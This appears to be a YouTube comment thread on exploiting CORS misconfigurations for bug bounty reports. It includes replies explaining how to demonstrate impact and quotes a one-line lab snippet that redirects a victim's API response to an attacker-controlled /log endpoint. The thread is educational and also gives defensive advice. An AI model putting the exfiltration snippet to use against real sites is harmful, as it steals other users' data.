Glad you liked it!

CORS policy does not directly prevent CSRF attacks because it controls access to responses rather than stopping requests from being made. Proper CSRF defenses, like CSRF tokens or SameSite cookies, are still required to protect against such attacks.

Calling a js is not showing impact.Remember you want to have the victim visit a page which is then executing a script which will call something interesting like an API and the response is logged to a server you control. Some BB programs say a pure CORS misconfig is informational. If cookies are passed you may get a low payout. But critical is only when you can exfiltrate some data from another user in a POC

@@martinvoelk Thank you for the response Glad to be your subscriber. I'm so new into this and eager to learn. I downloaded the file from github called cors exploit Pasted link in it and it did exploit shows some ids in the browser and i reported it. Hopefully will get something out of it 😅

@@martinvoelk and i scanned the website using burp professional crawl and audit. This is how i found that vulnerability burp shows high severity then i investigate it and found your channel.

@@patehkhan9119 Best of luck. It takes a while, but once you get the hang of it you will find these all over. I still do it despite having a full time Pentester job, wife and family. Very addictive :)

You are making an AJAX request. If you follow that lab, you will see an API call made. Now you want to read the response. You put the AJAX request into a script. Then the victim visits that. The cookies are being sent along and the response is logged at the attacker server. You need to check the log files. Check the solution on Portswigger.. This is the key function reqListener() { location='/log?key='+this.responseText; Basically it will be logged at /log?key= Check the log once you delivered it to the victim

Steal sensitive data: By exploiting a vulnerable CORS policy, attackers can bypass same-origin policies and retrieve sensitive information like user credentials, tokens, or personal data from another origin. Perform unauthorized actions: Attackers can send authenticated requests from a malicious website to a vulnerable API, performing actions on behalf of the victim, such as transferring funds or changing account settings, leading to account compromise or data manipulation.

Thanks

Thank you

That totally depends. In a Penetration Test it's a finding with low CVSS score. In Bug Bounty it's usually closed as informative however I had 2 companies pay me as a low. Normally they say in the Ts and Cs. CORS with impact. To pass cookies and make it impactful you need the allow credentials. Hope that makes sense?

Not necessarily. A 302 is a temporary redirect. you should check how the redirect is initiated. If it's via "Location" usually you cant pull anything meaningful of. Sometimes however it will redirect via window.location and then you might be able to introduce XSS

Yes absolutely. As a matter of fact you see CORS vulnerabilities often on POST requests

They probably need authentication. Most API endpoints will require some sort of authentication.

For Bug Bounty you often don't need to exploit it and just report the reflected headers. Some will accept it and some won't. For impact it depends. Take a look at the CORS labs from the Web Security Academy. Typically you make an Ajax call from your own host to a sensitive (behind login) function

@@martinvoelkhey martin I hope you are well, I have been working on BBP as a hatchling and just discovered my first CORS misconfig. Reading through the comments I was looking for impact, and this has answered my questions. THANK YOU!!!!!

@@ChristianScott-wj6qm cool

yes

sorry, i listened for few minutes but you just repeated how this vulnerability works.

Ensure that the server only allows trusted origins to make cross-origin requests by properly configuring the Access-Control-Allow-Origin header. Additionally, use proper authentication and authorization mechanisms to prevent unauthorized access to sensitive resources.